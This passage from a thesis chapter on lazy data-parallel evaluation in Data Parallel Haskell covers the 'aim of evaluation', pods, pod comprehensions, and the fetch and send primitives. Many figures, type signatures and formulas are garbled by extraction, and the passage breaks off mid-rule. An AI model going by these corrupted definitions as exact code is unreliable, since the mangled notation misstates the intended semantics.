\(f\) to every element of a list, in a non-strict language the function applications only occur to those elements required by a subsequent computation. To highlight this dichotomy we investigate the potential for data-parallelism on lazy lists and monolithic arrays. The function map \((+1)\) in exList of figure 3.1 could be applied in a data-parallel manner to each element of the list \(xs\), because the surrounding sum consumes all of the resulting list. As a general rule, if a map expression is enclosed by a function that is both head and tail strict [75], then data-parallel evaluation of the map is feasible. If we aim to implement this model on a massively parallel SIMD machine, we would have to implement the list as a data-structure whose elements occupy consecutive memory. locations. This is at odds with the conventional run-time representation of lists using pointers. If lists at first seem unsuitable for data-parallel evaluation, monolithic arrays [38] provide a more obviously practical framework. Figure 3.1 defines the Haskell array-mapping function a map. The function array creates a monolithic array. The first argument defines the bounds of the array, and the second defines a list of associations of the form ‘index:=value’ where the contents of the array at index are defined to be value. The array function is strict in both the bounds and the indices of the association list, but not in the indexed values. As was seen to be the case with map and lists, the non-strictness associated with the values of array elements interacts awkwardly with data-parallel evaluation. For example, because of the properties of take and amap, the reciprocal function (1/) is only applied to the first eight elements of arr. We can see from the definition of exArray that it is possible to determine at compile-time that only the first eight elements of arr are required; does this form a general rule? ``` > map f [] = [] > amap f a = array b [i:=f (a!i)|i<-range b] >map f (x:xs) = f x: map f xs > > where b = bounds a > >exList xs >exArray arr >= sum (map (+1) xs) > = sum (take 8 (elems (amap (1/) arr))) ``` Figure 3.1: List & Array Map Chapter 3. Laziness and parallel Data Structures We propose an evaluation mechanism that combines the desirable features of the lazy and strict evaluation of map. Whenever a map-like computation is forced, multiple elements of the parallel object being mapped evaluate their results synchronously. However, the mechanism retains non-strict semantics. In the discussion so far, non-strictness and data-parallelism have been mixed only if it is possible to determine at compile-time how much of the object resulting from a map-like computation is required. The model we propose delays this choice to run-time when we know exactly what needs to be evaluated. We maintain a run-time data structure called the aim describing those elements that are required to be evaluated. Whenever a map-like computation is forced the function applications of the map are evaluated in parallel at those elements defined by the aim. map can therefore be implemented as $O(1)$ whilst retaining all the benefits of non-strict evaluation. 3.2 An introduction to the `aim of evaluation' 3.2.1 The print-eval loop: aim = multiple points of interest The concept of the aim of evaluation arose from the concern that the print-eval loop of a non-strict language unnecessarily serialises and throttles potential parallelism within a program. In its simplest form, the print-eval loop consumes a list of characters by outputting them one-by-one to the screen. In a non-strict language, the implementation should do only just enough evaluation to generate each character in turn. Given the expression: \[ \text{concat (map (integerToString . (+1)) [1..])} \] the print-eval loop will try to print the first character of the list denoted by the expression. This will force the production of the first element of the natural numbers, and then map will add one to the value forced. The resulting number 2 is converted into a string, and finally, the print-eval loop can print its first character. The aim of evaluation provides the programmer with a mechanism of explicitly parallelising the print-eval loop. The idea is that instead of having a single point of interest at the head of the output stream, the programmer controls multiple points of interest. For example, in a sequential setting the expression take 8 ['a'..'z'] prints the characters abcdedefgh one after the other. In a parallel scenario, the same effect can be achieved by creating a parallel array, with a lower bound of 1, containing the characters 'a' through to 'z'. If the programmer sets the aim to identify array elements 1 through to 8, and evaluates the array of characters, then the first eight elements of the array can be evaluated in parallel. ### 3.2.2 The aim as an abstraction of a SIMD activity mask When using a SIMD machine computation is expressed in terms of parallel operations on monolithic array-like data-structures. These array-like structures are often distributed across the processors of a machine. In a typical mapping each processor contains a single element of an array. When programming in a language for a SIMD machine, the programmer is aware of the notion of an active set or activity mask which controls where computation occurs. For example, given two integer arrays to be divided element-wise, if any element of the divisor contains zero, then an error will be raised for the entire computation. Conventional imperative SIMD languages overcome this problem by setting the activity mask before troublesome statements are executed. In the context of division by zero, the activity mask would be set at those processors of the divisor that do not contain a zero, and then the division can be safely executed in parallel. From a machine perspective, the activity mask manifests itself in the hardware in terms of a register in each processor which controls whether the processor should be part of the lock-step evaluation of a SIMD program. The activity mask used by the imperative SIMD programmer is therefore an abstraction of the activity registers of each of the processors of a SIMD machine, and the aim of evaluation is an abstraction of the activity mask. 3.2.3 An operational view of the aim of evaluation. The aim forms an integral part of the data-parallel evaluation mechanism we propose. It is continually recalculated to identify just those elements of an array that are needed during each step of evaluation. We illustrate this recalculation by considering four typical scenarios where the aim plays an important role in data-parallel evaluation. Chapter 3. Laziness and parallel Data Structures In the discussion that follows, terms of the form expr represent arbitrary expression which when evaluated produce an array that is distributed throughout the processors of a parallel machine. The functions mapArray, zipWithArray, and filterArray are analogous to the standard list-processing functions with similar names. However, the marked difference is that these functions require parallel arrays as arguments, and produce arrays as results. The aim stays the same The evaluation of: \[ \text{mapArray integerToString expr} \] where expr evaluates to an array, produces an array in which each processor contains a textual representation of an integer. If evaluation only requires a subset of the array elements, then before the map can be applied, that same subset of elements from expr will need to be evaluated. Therefore given an aim ff for the entire computation, the lock-step evaluation will start by evaluating expr with the aim ff, and then the same set of processors will have their integer contents converted into a string. In general, map transmits the aim unchanged. Splitting the aim of evaluation Where there are different control paths within a program, the aim may change, splitting itself to mirror the control paths. Considering a single route through the tree of all the different control paths, the aim will steadily narrow during each step of a map computation. For example, zipWithArray can be used to map the four argument choice function across two integer arrays: Chapter 3. Laziness and parallel Data Structures let choice :: (Int->Int) -> (Int->Int) -> Int -> Int -> Int choice f g 0 y = g y choice f g x y = f x in zipWithArray (choice (+1) (+2)) exprA exprB In a data-parallel setting, the pattern matching involved with the evaluation of choice can be performed in parallel on the entirety of both expr A and exprB. If the above let-expression is evaluated with aim α, then because of the pattern matching of 0 required by the first equation, those processors identified by the aim α from the array exprA will be evaluated in parallel. The lock-step evaluation of zipWithArray (choice (+1) (+2)) will then proceed by identifying those processors within α that matched the pattern 0—they make up a new aim β (a subset of α) which is used in the parallel evaluation of g y. As g is bound to the strict function (+2), all of the ys (namely the array exprB) within the aim β will need to be evaluated, and then the computations of (+2) y can all occur in parallel. Once the first equation has completed evaluation, those elements of exprA that did not match the first equation can proceed to evaluate the second default equation. Again a narrowing of the aim will occur, where a new aim α - β is created that identifies those elements of α that did not match against the pattern 0. This aim will then be used to evaluate the expression f(x). As f is instantiated to the increment function (+1), then all the xs (namely the array exprA) will be evaluated with the aim α - β. Due to the initial pattern matching of choice, the array exprA will already be evaluated at a superset of the aim. Chapter 3. Laziness and parallel Data Structures required (\(\alpha - \beta \leq \alpha\)). Evaluation of exprA therefore finishes immediately, and then\((+1) \times \) occurs in parallel at processors identified by \(\alpha - \beta\). Finally, the evaluation of choice is completed by merging the arrays produced by the two pattern matching equations. In summary, the distinguish feature of this map-like evaluation is that if the function being mapped has \(n\) different pattern-matching equations (i.e., control paths), then the aim used by the map is split into \(n\) pieces. Each of the new aims models the processors which matched a particular pattern matching equation. All of the right-hand sides of the equations are then evaluated sequentially, one after the other, with the newly created aims (This model of evaluating pattern matching equations is aimed towards the lock-step evaluation required by a SIMD machine. Other machine models would use a scheme that is better utilised for their own architectural features. For example, an MIMD machine could create the aim for each of the control paths, and then evaluate all the right- hand sides concurrently). The resulting arrays are finally merged together to produce an array that encapsulates the entire computation. Growing the aim There are often circumstances in which the aim dramatically grows to mirror the data-dependencies that often occur within function definitions. For example, if the first ten elements of the array produced by the following expression are required: \[ \text{filterArray even expr} \] then it would be incorrect to evaluate expr at the same ten processors. What will be required is to evaluate expr just enough such that its first ten even elements are accounted Chapter 3. Laziness and parallel Data Structures for. Therefore interwoven with the filtering will be a "growing" of the aim such that it encapsulates just enough of expr to provide the ten elements initially requested. The steps involved in the evaluation of filterArray are: (1) the aim is set for the filter expression as a whole; (2) filterArray grows the aim---not necessarily one element at a time---evaluating expr until all the elements that are to be filtered are encapsulated; (3) the evaluated elements of expr are finally collected into an array in which the filtered elements occupy consecutive array elements. In the definition of a parallel filterArray, growing of the aim is controlled by a send parallel data-communication primitive. Given an array to be filtered, parallel filterArray calculates a destination for the contents of each processor, such that the resulting array contains just the right elements from the original. The send used to perform this communication implicitly controls steps 2 and 3 outlined above. Narrowing the aim The final example highlights that many processors can often share evaluation of a common set of processors. Consider the array denoted by the sequence: \[ B = [A 1; A 2; A 2; A 3; A 3; A \ldots] \] in which the first element contains the first element from array A; the next two elements are from the second element of A; the next three elements are from the third element of A, etc. If the first 10 elements of B are to be evaluated, then only 4 elements of A will be required. Similarly, 5151 elements from B will only require 100 elements from A. The effect of each processor selecting the contents of other processors, where there is the potential for many processors accessing a common processor is achieved using a fetching Chapter 3. Laziness and parallel Data Structures parallel data-communication primitive. Like the send communication briefly mentioned above, the implementation of fetch changes the aim such that only the processors which have their contents "fetched" are evaluated. This thesis is concerned with the implementation of the aim such that it models the four features outlined above. Unfortunately the presentation of the material will be in a form that bears little similarity to that here. One reason for this is that so far we have considered the interaction of the aim with Haskell functions. In contrast, the approach adopted in the rest of the thesis is to take a layered approach that translates Haskell into a sugared form of the lambda-calculus. The benefit of this approach is that it is easier to reason about the aim of evaluation, and the mechanics of evaluation with the aim, in terms of transformations and ultimately the evaluation of the lambda calculus. 3.2.4 Data-parallel non-strict glue Given that the aim is one way of achieving a non-strict semantics within a data-parallel setting, we propose that the aim enables existing techniques that utilise non-strictness to be carried through to a parallel environment. In a combinatorial search problem he showed how the generation of the search space can be decoupled from the process that searches the generated space. This decoupling is achieved by defining a function that generates a potentially infinite search space, and a different function that traverses the generated data-structure looking for solutions to the combinatorial search problem. When the two functions are composed, non-strictness ensures that just those parts of the search space Chapter 3. Laziness and parallel Data Structures required to find a solution are generated---non-strictness therefore provides a special kind of "glue" for combining sub-problems. Using the aim of evaluation as a method of achieving data-parallelism with a non-strict semantics, we can utilise the same technique in a data-parallel setting. Because of a non-strict semantics it is possible for data-parallel arrays to be potentially infinite. A generation function for the search problem can therefore be defined to distribute the search space throughout the consecutive elements of a potentially infinite array. If a consumer function identifies those points within the search space that are valid combinatorial solutions, then the valid solutions can be filtered to occupy consecutive locations of a solution array. Just as Hughes observed, the generation and consumption of the search space can be achieved by composing the producer and consumer functions together. If only the first solution is required, then the aim would be set to the first element, and the evaluation would grow the aim, effectively searching for the single solution within the search space in parallel. However, the benefit of using the aim of evaluation is that if 50 solutions are required, the aim would be set from elements 1 through to 50 of the parallel solution array, and because of the multiple points of interest, the fifty solutions will be found in parallel. The expansion of the search space for each of the fifty solutions will therefore occur concurrently, whilst the entire computation retains a non-strict semantics. 3.3 PODS All parallelism in Data Parallel Haskell (DPHaskell) is achieved by operations on parallel data structures called pods. A pod represents a collection of index/value pairs, where each index uniquely identifies a single element of a pod. As pods are an abstraction of the processing elements of a data-parallel machine, we choose to collect the index value pairs into a data type we call a "processor". For example, (|42;"DON'T PANIC"|) represents a single processor of a one-dimensional pod (a vector), where (| and |) are used as delimiters in the same way as brackets are used to delimit a tuple. The expression determines that the value of the pod at a position identified by 42 is "DON'T PANIC". At the beginning of our work, we envisaged higher-dimensional pods, characterised by multiple indices to identify a single element within the pod. The general form of a processor would therefore be (|e₁, . . . ,ek ; e|) where k >= 1, and the sequence of expressions e₁ to eₖ would uniquely identify an element in a k-dimensional parallel object; e would describe the data in that element. As a consequence of having multi-dimensional parallel objects the name pod is derived from the acronym Parallel. Objects with arbitrary Dimensions. However, because the use of pods is tightly coupled with the pod comprehension notation presented below, we have found that ambiguities arise in the semantics of higher-dimensional pod comprehensions, so we restrict pods to a single dimension. A pod contains a sequence of uniquely labelled processors, any of which may be missing. The empty pod that contains no processors does not necessarily consume no resources when an implementation maps a pod to the real processors of a data-parallel Chapter 3. Laziness and parallel Data Structures machine. At the language level we do not specify how pods should be implemented in terms of either sparse or dense parallel data-structures. Therefore the empty pod, or in keeping with our analogy, a mange-tout, may consume the same resources (i.e., space) as a pod in which every processor is defined. In summary, pods are different from ordinary monolithic arrays because they contain holes where processors are missing. PODs also differ from arrays in a more fundamental way because their size is unbounded and potentially infinite. Because of the semantics of a non-strict language, where evaluation only occurs at the point that it is required, the evaluation of a finite portion of an expression that denotes an infinite object is possible. In an implementation, a dense finite object is created, with a size equal to the difference between the smallest and largest indices defined by the aim. If pods are re-evaluated with a different aim, then the representation of a pod grows accordingly. 3.4 POD comprehensions Figure 3.2(a) defines a function that negates each element of a list using a Haskell list comprehension. This syntax provides a good starting point for a parallel notation because it decomposes a problem into the transformations that occur at each element of a list. Because there is no implied sequencing to the transformations that could result in dependencies between each of the elements of a parallel data-structure, then the transformations can be applied independently all at the same time. Figure 3.2(b) defines a pod comprehension corresponding to the list comprehension of figure 3.2(a). The desired Chapter 3. Laziness and parallel Data Structures reading of the negateV function is "For each defined processor in vec identified by y, that contains data x, create a one-dimensional pod such that each processor at y contains the data -x ". Examining the definition, we see that only '-' is specific to the negateV function. This means that the computation of the vector negate can be modularised by gluing together a general pod comprehension and a function that is applied to each defined element of a pod. By parameterising the definition of negateV on the function applied to each element of the pod, we derive \text{mapPod} defined (a) List comprehension \hspace{1cm} \text{negateL} \hspace{0.5cm} xs = [ -x \mid x \leftarrow xs ] (b) POD comprehension \hspace{1cm} \text{negateV} \hspace{0.5cm} vec = << (y; -x) \mid (y;x) \leftarrow vec >> (c) Redefinition of (b) using \hspace{1cm} \text{mapPod} \hspace{0.5cm} f \hspace{0.5cm} vec = << (y;f x) \mid (y;x) \leftarrow vec >> \hspace{2cm} \text{higher-order pod map} \hspace{1cm} \text{negateV} \hspace{0.5cm} vec = \text{mapPod} \hspace{0.5cm} (x \rightarrow -x) \hspace{0.5cm} vec Fig. 3.2 : From lists to vectors .... mapping negate in parallel in figure 3.2(c). As the motivation behind the aim evaluation mechanism was the efficient parallel implementation of a non-strict map, it is not surprising that mapPod has a $O(1)$ time complexity in relation to the size of the vector being mapped. The semantics of list comprehensions is very much tied to set theory, in such a way that whenever multiple generators are used in a comprehension, all possible combinations of values are produced as a result. For example the expression Chapter 3. Laziness and parallel Data Structures \[ [ (x,y) \mid x \leftarrow [1..10], y \leftarrow [1..10] ] \] generates the cartesian product of two lists. More surprisingly \[ [ x \mid x \leftarrow [1..10], y \leftarrow [1..10] ] \] generates a list with 100 elements---the computational interpretation of generators is very much tied to iteration. Since we believe that effective use of a parallel machine with thousands of processing elements can only be attained with pods containing thousands of elements, a strategy that relies upon a combinatorial explosion of values must somehow be avoided---the physical constraints of a machine's memory would soon be exhausted if pods contained millions of elements. The solution we adopt to this problem is two fold: (1) we ensure that for each element drawn from a generator, only one element will be drawn from subsequent generators---"zip like" drawing; (2) the drawing of elements from the generators of a pod comprehension is performed lazily such that values are drawn only as required. Addressing the first of these issues, we exploit the fact that the index of a pod element is unique. If we draw an element \((i;v)\) from a pod, we can be sure that we will not be able to draw any other element with index \(i\). We may however wish to draw an element \((i;w)\) with the same index \(i\), from some other pod in a different generator. We therefore propose two versions of the generator: \((p;p_d;!) \leftarrow POD\) is read as drawn-from and names in the patterns \(p\) and \(p_d\) are bound by the generator; \((e;p_i;!) \leftarrow POD\) is read indexed-from and the value represented by the expression \(e\) determines which processor's contents should be matched against the pattern \(p_i\). Drawn-from generators provide a point of interest. Chapter 3. Laziness and parallel Data Structures Comprehensions contain at most one drawn-from generator as multiple points of interest make little sense for subsequent generators in a comprehension. Therefore the expression x in the index generator \((x;b) \ll= \text{vecB}\) of figure 3.3(a) is bound by the pattern x in the preceding drawn-from generator. The intended semantics are that the constraint of the generators ensures zip-like drawing; the comprehension therefore defines a vector addition operation. Comprehensions (a) \(\text{addV vecA vecB} = \langle (x;a+b) | (x;a) \ll= \text{vecA}, (x;b) \ll= \text{vecB}\rangle\) (b) \(\text{shiftAnd vec} = \langle (x;a\&\&b) | (x;a) \ll= \text{vec}, (x-1;b) \ll= \text{vec}\rangle\) (c) \(\text{negateV' vec} = \langle (x;-y) | (x;y) \ll= \text{vec}, (x;z) \ll= \perp\rangle\) Figure 3.3: The lazy semantics of pod comprehensions are not just restricted to simple zip-like drawing. The index-generator in figure 3.3(b) defines a constraint \(x-1\) which results in communication between elements of the pods—we return to communication a little later. The second issue, crucial to the semantics of generators, is lazy drawing. Using \(\ll=\) draws elements from processors in a strict manner—the processors have to be defined for a result to be defined. However \(\ll=\) draws processors and their contents from a pod lazily. Chapter 3. Laziness and parallel Data Structures depending upon the strictness characteristics of their subsequent use. An analogy can be made between this model and refutable and irrefutable (strict and lazy) pattern matching in Haskell. The definition of negateV shown in figure 3.3(c) has the same semantics as the earlier definition of negateV in figure 3.2(b), since the variable z is not used in the comprehension. In contrast a similar list comprehension below tries to draw elements from ?, resulting in the comprehension evaluating to ⊥. \[-x | x \leftarrow [1..10], y \leftarrow \perp\] Figure 3.3 (b) shows a more subtle example in which processors and their contents only have to be defined depending upon the strictness of &&. Given a processor identified by x that contains False, due to the laziness of &&, neither the processor nor its contents at a position identified by x-1 need to be defined. We clarify such semantics in fig 3.6. The constraint used in the function shiftAnd of figure 3.3(b) causes communication between elements of the vector vec. We generalise such communication into two models: fetching data from a remote processor to a local processor, and sending data from a local processor to a remote one. The first expression shown in figure 3.4 uses the sending model of communication. Data stored in a processor identified by x is sent to a processor at location x+2. The effect is to shift every defined processor's contents two places to its right. In contrast, the expression on the right of figure 3.4 uses the fetching model of data communication. The value x bound by the drawn-from generator (\<-\) represents the processor in which data will be placed. The data is fetched from the contents of a processor determined by the constraint on the index-generator (\<=\). By drawing elements from the Chapter 3. Laziness and parallel Data Structures infinite pod in the drawn-from generator (every processor and index is defined), a binding occurrence for \( x \) is provided for subsequent generators. Although the use of \( \text{inf} \) looks clumsy, rarely is such trickery required in a fetch computation see for example, the fetch used in the definition of parallel scan in fig 4.1.2. As we shall see in the denotational semantics, the clumsiness has \[ \begin{align*} \text{let } f &= \lambda z \rightarrow z + 2 \\ \text{let } f' &= \lambda z \rightarrow z - 2 \\ in &\text{ inf } = \langle\langle ..42.. \rangle\rangle \\ \langle\langle (f \ x; y) \mid (x; y) \langle\langle \text{vec} \rangle\rangle \rangle &\text{ in } \langle\langle (x; y) \mid (x ;\_\_\_ \_\_) \langle\langle \text{inf} \rangle\rangle \\ (f' \ x; y) &\langle\langle \text{vec} \rangle\rangle \end{align*} \] Figure 3.4: The duality of send and fetch some theoretical backing, as in \( f \) is used to create a binding occurrence for elements in \( Z \), resulting in a definition which looks similar to the denotational semantic definition of fetch. In these two examples, as the lambda expression used in the fetch is the inverse of that used in the send, the two expressions are equivalent. This equivalence between sending and fetching expressions does not always hold as the inverse to a function used in data communication may not exist. For example, with the sending expression Chapter 3. Laziness and parallel Data Structures \[ \langle \langle \langle f \ a, v \rangle \mid \langle a, v \rangle \rangle \rangle \langle \langle - \ vec \rangle \rangle \] vec may contain \( \langle x, vx \rangle \) and \( \langle y, vy \rangle \) where \( f x \in f y \). In this case, either \( \langle f x, vx \rangle \) or \( \langle f y, vy \rangle \) might appear in the solution, though not both since an index must identify a unique value. An implementation may choose either solution (see fig 3.5.5). Constraints of a different nature can also be applied to pod comprehensions in the form of boolean guards. These guards act as filters that select those processors for which the guard is True from a more general stream created by the generators. For example the expression \[ \langle \langle \langle x, X \rangle \mid \langle x; 42 \rangle \rangle \rangle \langle \langle - \ vec, even x \rangle \rangle \] defines a pod in which each processor contains its identifier as long as that processor originally contained the number 42 and its processor identifier is even. A collection of higher-order functions based upon the examples in this section are shown below. The mapPod function of figure 3.2, is generalised to form a zip-with computation by using a drawn-from generator in a pod comprehension. The sendPod and fetchPod functions are based upon the communication functions of figure 3.4. sendIPod is similar to sendPod, except that an index-pod (i.e., a pod containing elements that identify the processors in another pod) is used to specify the processors where communication occurs to and from. \[ > \text{mapPod} :: \text{Pid} x \Rightarrow (a \rightarrow b) \rightarrow \langle \langle x; a \rangle \rangle \rightarrow \langle \langle x; b \rangle \rangle \] \[ > \text{mapPod} \ \text{fn vec} = \langle \langle x; \text{fn} y \rangle \mid \langle x; y \rangle \rangle \langle \langle - \ vec \rangle \rangle \] \[ > \text{zipWithPod} :: \text{Pid} x \Rightarrow (a \rightarrow b \rightarrow c) \rightarrow \langle \langle x; a \rangle \rangle \rightarrow \langle \langle x; b \rangle \rangle \rightarrow \langle \langle x; c \rangle \rangle \] Chapter 3. Laziness and parallel Data Structures > zipWithPod fn vecA vecB = << (lx; fn y zl) | (lx;yl) <= vecA > (lx;zl) <= vecB >> > > fetchPod :: (Pid x, Pid y) => (x -> y) -> (x;yl) <= vecA > fetchPod fn vec = << (lx;yl) | (lx;zl) <= vec , > (lx;yl) <= vec >> > > sendPod :: (Pid x, Pid y) => (x -> y) -> (x;yl) <= vecA > sendPod fn vec = << (lx;yl) | (lx;yl) <= vec >> > > sendIPod :: (Pid x, Pid y) => (x;yl) -> (x;yl) <= ivec > sendIPod ivec vec = << (lx;yl) | (lx;yl) <= ivec , > (lx;yl) <= vec >> > 3.5 The semantics of POD comprehensions: primitive operations The formal semantics of pods and pod comprehensions is given in terms of translation rules that produce Haskell enriched with the primitive parallel operations map n, indices, fetch and send. The rules provide an insight into the implementation of the data-parallel extensions by using a "concrete" representation of parallel objects, where all communication is performed by primitive data-rearrangement operations. The denotational Chapter 3. Laziness and parallel Data Structures semantics of the parallel data-structures and primitive operations is given in Chapter 3. Here we give an informal description of the primitives, along with definitions in terms of pod comprehensions. 3.5. 1 \perp and the representation of PODs Before describing the primitive parallel operations, we set the scene by highlighting various problems and peculiarities associated with \perp (bottom) in data-parallel programs. Figure 3.5(a) defines an expression with a value equivalent to \perp. Evaluation at an undefined processor of a pod results in \perp; the expression in figure 3.5(b) is therefore interpreted as (a) \begin{align*} & \text{let bot = bot in bot} \\ (b) & \langle\langle (1;2),(3;4) \rangle\rangle \end{align*} (d) let f 0 = bot | (b) \begin{align*} & \langle\langle (1;2),(3;4) \rangle\rangle \rangle \end{align*} (f n = n) (c) \begin{align*} & \langle\langle (1,2), (2; \text{bot}), (3;4) \rangle\rangle \end{align*} \begin{align*} & \text{in} \langle\langle \text{if } x,y \rangle | (x;y) \langle\langle -\text{vec} \rangle\rangle \end{align*} Figure 3.5: A selection of bottoms only defining values for processors one and three. The semantics of (b) differs from the pod shown in figure 3.5(c), although indexing (b) and (c) at any index produces the same values. The difference between the two expressions is highlighted by mapping \lambda x \rightarrow 42 Chapter 3. Laziness and parallel Data Structures over each pod. Indexing the resulting pods at processor two results in \( \perp \) for (b) but 42 for (c). Figure 3.5(d) shows a peculiar case of bottom. If the expression in the index position of a processor on the left-hand side of a comprehension results in bottom (such as processor \( f \: 0 \) in (d)), the effect is to erase that processor's contents from the resulting pod representation—a pod can never be indexed at processor \( \perp \). Keeping such characteristics of pods in mind, we present a representation of a pod suitable for implementation on a SIMD machine. A conventional non-strict evaluation mechanism enables expressions such as (a) to be manipulated. An extended evaluator based upon the aim mechanism allows expressions such as (c) and (d) because only those processors defined by the aim are ever evaluated. Unfortunately, (b) poses problems. pods are implemented as extensible, dense, array-like structures—if processors \( x-1 \) and \( x+1 \) exist, then processor \( x \) exists. Such an “implementation”pod or vector has no representation for the semantics required in figure 3.5(b). Therefore when vectors are used to model pods, the vectors need to encode a representation of “not here” for any undefined processors. A solution to this problem is to represent pods by the product type: \[ \text{Data}<<([\text{Int};\alpha]) \gg \equiv \text{MkPod} \ll \text{Bool} \ll \alpha \] where \( \ll \alpha \) represents an implementation vector of type \( \text{ff} \). Wherever the value of an entry in the boolean mask defined in the first part of the product type is True, the corresponding element in the second vector has a defined processor—“I'm here”. Although it seems that a lot of trouble has been expended on fulfilling the desired semantics of figure Chapter 3. Laziness and parallel Data Structures 3.5(b), they ensure an important invariant that is required in the implementation of map \( n \) (see fig 5.1.2). 3.5.2 map The primitive function map\( n \) is analogous to the family of list functions, map, zipWith, zipWith3, etc. The drawing of elements occurs as required in a zip-like manner by index. All the function applications of the map occur synchronously and in parallel at those processors defined by the aim of evaluation. Informally, the semantics of map1 and map2 are defined by the pod comprehensions below, where vec has a vector type, and not a pod type: \[ \text{map1} :: (\alpha \rightarrow \beta) \rightarrow \langle \alpha \rangle \rightarrow \langle \alpha \rangle \] \[ \text{map1 } f \text{ vec } = \langle \langle (x;f y) \mid (x;y) \rangle \langle \alpha \rangle \rangle \] \[ \text{map2} :: (\alpha \rightarrow \beta \rightarrow \gamma) \rightarrow \langle \alpha \rangle \rightarrow \langle \beta \rangle \rightarrow \langle \gamma \rangle \] \[ \text{map2 } f \text{ vecA vecB } = \langle \langle (x;f y z) \mid (x;y) \rangle \langle \alpha \rangle \rangle ; \langle (x;z) \rangle \langle \beta \rangle \rangle \] 3.5.3 indices A pod comprehension manipulates the indices of a pod as integers. As with arrays, these indices are an abstraction of the contiguous nature of a machines memory. Given the index \( n \) of the first pod element, the \( (k + n) \)th pod element will be at a fixed offset \( k \) from the prior element. As the indices are an implicit part of the pod representation, the primitive function indices "recreates" the processor number by converting a vector of booleans into a vector in which each processor contains an integer that represents the processor number informally indices can be defined by the vector comprehension: \[ \text{indices} :: \langle \text{Bool} \rangle \times \langle \text{Int} \rangle \\ \text{indices mask} = \langle (x; \text{if } m \text{ then } x \text{ else error "Bottom" } ) \rangle (|x; m|) \langle -\text{mask} \rangle \] ### 3.5.4 fetching An index vector is a vector of integers which is used to identify the processors in which communication occurs to and from. Evaluation of fetch ivec data, where \( (x; i) \in \text{ivec} \) fetches the contents of processor \( i \) from data, and places it in processor \( x \). The novel feature of fetching communication is that it is inherently lazy. In the implementation, if a fetching primitive is evaluated with an aim \( \alpha \) then only those processors of \( \text{ivec} \) defined by \( \alpha \) are evaluated. Once evaluated, this vector is used to construct a new aim \( \beta \) which is used in the evaluation of data. Once data is evaluated, communication occurs that transfers the contents of each of the evaluated processors into a destination specified by the original index vector \( \text{ivec} \). Informally the semantics can be expressed as the pod comprehension below. \[ \text{fetch} :: \langle \text{Int} \rangle \rightarrow \langle \text{Int} \rangle \rightarrow \langle \text{Int} \rangle \\ \text{fetch ivec data} = \langle (x; y) \rangle \langle (x; i) \rangle \langle -\text{ivec}, \langle i; y \rangle \rangle \langle -\text{data} \rangle \] Chapter 3. Laziness and parallel Data Structures 3.5.5 sending The sending primitive that has the the informal semantics shown by the pod comprehension below has two problems associated with it: (1) sending does not fit into the 'aim' model of evaluation—a search of a potentially infinite pod is required; (2) multiple processors may send their contents to the same processor, it is not clear how this should be resolved. \[ \text{send} :: \langle \text{Int} \rangle \rightarrow \langle \alpha \rangle \rightarrow \langle \alpha \rangle \] \[ \text{send ivec data} = \langle\langle (j; y) \mid (x; i) \rangle\rangle \langle\langle ivec, (x; y) \rangle\rangle \langle\langle data \rangle\rangle \] The first of these problems is a result of incorporating laziness into a data-parallel language. Aims are a technique of ensuring that map can be implemented in a synchronous manner on a data-parallel machine. In the implementation, a data-parallel evaluation mechanism threads the aim throughout a program, continually calculating which set of processors needs to be evaluated. The sending primitive throws a spanner into the works of the aim mechanism. If the primitive send ivec data is evaluated with an aim ff, then the index vector ivec is inverted, and the primitive fetch ivec-1 data is performed; the essence of send is the runtime calculation of which processors are needed to convert the send into a fetch. Unfortunately inverting the index vector is not simple as ivec is potentially infinite. Given Chapter 3. Laziness and parallel Data Structures the aim ff, ivec is evaluated in such a way that for each \((x; i) \in ivec\), then every processor identified by the aim is accounted for by each \(i\) of ivec. If no processor sends its data to a processor identified by the aim, then evaluation of the index vector may continue for a very long time. This is the motivation behind the "bottom" semantics for undefined processors-the search of the index vector in a sending communication may not terminate. The second problem associated with sending has been addressed many times elsewhere \([65,66]\). The common technique used to resolve collisions in a send is to apply an associative binary operator to all colliding data. As this technique is potentially usefull, some parallel \[ \begin{align*} \text{aexp} & \perp \ll ((\text{exp};\text{exp})) | \text{pqual} \ 1 \ , \ : \ : \ , \text{pqualn} \gg \ (\text{POD comprehension}) \\ \text{pqual} & \perp \text{exp} \ (\text{filter}) \\ | \ (\text{var};\text{var}) & \ll - \exp \ (\text{drawn-from}) \\ | \ (\text{exp};\text{var}) & \ll - \exp \ (\text{indexed-from}) \end{align*} \] Figure 3.6: Syntax of POD comprehensions computer manufactures have provided communication hardware for making collisions more efficient \([11]\). However, each list will not be nil (i.e \([\ ]\)) terminated---the tail of the list will always contain bottom as we cannot determine when a potentially infinite set of processors have stopped sending data. This means strict functions such as + cannot be used to resolve collisions. The solution we adopt is to choose a single value from the colliding data. Although this implies a non-deterministic semantics, an implementation on a SIMD machine will always be deterministic. 3.6 The semantics of POD comprehensions: desugaring The semantics for pod comprehensions (syntax shown in figure 3.6) is presented in-terms of a series of translation rules that "desugar" the comprehensions into the primitive parallel operations presented in the previous section. The motivation behind this desugaring is the conversion of the "microscopic" view of transformations applied to the elements of a pod, into a "macroscopic" view of applying monolithic operations to the pod as a whole. This translation defined by schema TPOD, provides the foundations for the vectorisation of functional programs described in Chapter 5. The initial state of the translation scheme is TPOD [[pod]] [ ] «...True ...», and to eliminate scoping problems the patterns in generators are assumed to be unique variables. The translation scheme uses the following information for book-keeping purposes: 1. a mapping from bindings in a source language comprehension that represent elements of a parallel object, to bindings in the translated language that represent entire parallel objects. For example, given the expression 'x + 2' where x represents an element of a parallel object, the translation produces expressions of the form map1 (λ x → x + 2) x in which x represents the entire parallel object that x is an element of; the mapping x → x is recorded during translation. When the notation binds[x → y] is used on Chapter 3. Laziness and parallel Data Structures the top line of a translation rule it defines the mapping $x \rightarrow y$ as a member of the environment. When it is used on the right-hand side of the translation, it defines that the environment is extended with the mapping $x \rightarrow y$. 2. a mask which defines the valid processors in the pod resulting from the comprehension. 3.6.1 Drawn-from Drawn-from generators provide a mechanism of anchoring a point of interest for subsequent generators in a comprehension. Those processors defined in the pod being drawn-from are used to define the processors in the pod that results from the comprehension. Translation rule 1 below encapsulates such semantics. Case analysis is first performed on the pod on the right-hand side of the generator to expose its implementation structure. The exposed mask that represents the defined processors of vec is then threaded through successive calls to the translation scheme, eventually re-emerging in rule 4 to define the valid processors of the pod that results from the comprehension. Notice how the $x$ and $y$ in the translated code represent all the indices and contents of vec, whereas $x$ and $y$ in the original comprehension represented a single index and element of the pod vec. The implementation structure of pods is reinforced by this rule, as a vector of integers that represents vec's indices is created by the indices primitive. Chapter 3. Laziness and parallel Data Structures TPOD \([ [\ll e\| (| x ; y |) \ll vec , q ] ] \) binds mask junked \[= 